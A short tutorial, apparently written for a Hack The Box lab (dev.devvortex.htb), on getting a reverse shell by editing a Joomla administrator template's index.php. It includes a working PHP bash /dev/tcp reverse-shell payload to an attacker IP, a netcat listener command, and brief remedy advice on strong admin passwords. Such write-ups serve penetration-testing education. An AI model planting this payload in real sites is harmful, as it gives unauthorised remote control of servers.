This article explains how to create a reverse shell in Joomla platform

1. Log into Joomla platform

  • http://dev.devvortex.htb/administrator/

2. Having access to the Jommla Administrator dashboard navigate to System->Templates->Administrator Templates

  • Select the template you want to edit

3. Go to Index.php (or any other page that is executed)

4. Insert your PHP code in here, and click on save

  • system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.166/4444 0>&1'");

Note: In this case I added a reverse shell, you can use echo first to try to make sure a string is printed and the code executed

  • echo “Vry4n was here!”;

5. Start a listener in your local machine

  • nc -lvp 4444

6. Refresh the Joomla Administrator page, and, you should receive a reverse shell

Remedy

Ensure administrators use strong passwords

Grant administrator access only to users that require it